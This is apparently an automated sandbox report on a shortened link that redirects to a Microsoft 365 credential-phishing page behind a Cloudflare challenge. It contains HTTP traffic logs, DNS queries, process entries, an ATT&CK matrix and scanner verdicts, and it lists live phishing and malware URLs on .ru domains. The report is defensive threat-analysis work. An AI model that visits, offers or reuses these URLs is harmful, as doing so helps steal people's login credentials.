Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90271690994917b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90271690994917b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mstn.qomitarnor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mstn.qomitarnor.ru/JY1H/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklMOW9BbVA4YTg5YncyWmMzMzI5d1E9PSIsInZhbHVlIjoiZmxzV0t5MmNFemdKRzlvRkhqT3RzT2pKZTBlNVpxamZFV2Q3bDRiRkF2TFcxdlZWd3dpSm1lZDNhRUZ2SVVINVFicFZTRFdJeXZMRURGWi80amc0cHpDbjVRVFpnUks0YlFBZkxXdjJZbDZSRElGWFBzdEovMVFzVlQzNUY4ZnAiLCJtYWMiOiI5MGM5MTRjZmI3NzhkYTk0NTMzMTJjM2RmMDFiYzQ2MDg3ZDVhNWFkOWVkMGJjZDEwODY5NzUzMzc4NTAyODdiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IktiZEw1ZmxJMlRpcHVDNWF6OXh1SlE9PSIsInZhbHVlIjoiY1F1dm5YUUpxbTgyVk44OGFlMDI3UWUwYVdvNmhBL0hKSy9GcEptakFKQUV6akNXRGNBYVljUERSMC9ubDJYd2hFK3BWK1RHNU96cWVyNjEwSzFBa1ZYeTNaUldUbE1pOWF5MXk1SFdlNzVzVTVLZE5kY3dNS2NmYXZYK2haSC8iLCJtYWMiOiJhNWQwNzFiN2Y2NzFjYTY0YTA3ZDlkODQ4MjczNGIyZjY2ZDIzNjI0NGQ3ZTBlOGEwOGJkODNiMGZmYmJjNmNiIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90271690994917b5/1736956927200/Z-kY-gEwytbJMdd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/90271690994917b5/1736956927200/Z-kY-gEwytbJMdd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/90271690994917b5/1736956927204/056a419110721377e49177db5bf30d57c1fe1e6445ac46b00353113652a48a26/eWYiKqFvv6qKmlM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK HTTP/1.1Host: 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mstn.qomitarnor.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK HTTP/1.1Host: 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: mstn.qomitarnor.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3171sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAzsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 16:02:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 3175Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLscRZrzv7RzBaZ6VSP1fRDHyk5j%2FVISJPU7HCfQXVaqCxZmuxzhD%2FwkNCbjQInzEhXsDXffgy5w5ujr6pqEn6AsBUxXnr4Pfl0lw877s3Da2NOLBxPA2HIUiHF0qw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5026&min_rtt=4992&rtt_var=1428&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2260&delivery_rate=563291&cwnd=245&unsent_bytes=0&cid=7711d819a216f9c7&ts=38&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 9027169a9b80a261-YULserver-timing: cfL4;desc="?proto=TCP&rtt=17856&min_rtt=17851&rtt_var=6705&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1898&delivery_rate=163155&cwnd=32&unsent_bytes=0&cid=46a47dcab5fc88a4&ts=195&x=0"
Source: chromecache_81.1.dr, chromecache_90.1.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_81.1.dr, chromecache_90.1.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: classification engineClassification label: mal52.win@22/75@38/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,6220749395400112799,8409351740452075553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/Amconconstruction"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,6220749395400112799,8409351740452075553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://tinyurl.com/Amconconstruction0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://mstn.qomitarnor.ru/favicon.ico100%Avira URL Cloudphishing
https://1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru/pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWK100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0016.t-0009.t-msedge.net
13.107.246.44
truefalse
    high
    tinyurl.com
    104.17.112.233
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru
        104.21.48.1
        truefalse
          high
          code.jquery.com
          151.101.2.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  www.google.com
                  142.250.185.132
                  truefalse
                    high
                    mstn.qomitarnor.ru
                    188.114.96.3
                    truetrue
                      unknown
                      www.office.com
                      unknown
                      unknownfalse
                        high
                        identity.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://tinyurl.com/Amconconstructionfalse
                                high
                                https://mstn.qomitarnor.ru/favicon.icofalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru/pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWKfalse
                                • Avira URL Cloud: malware
                                unknown
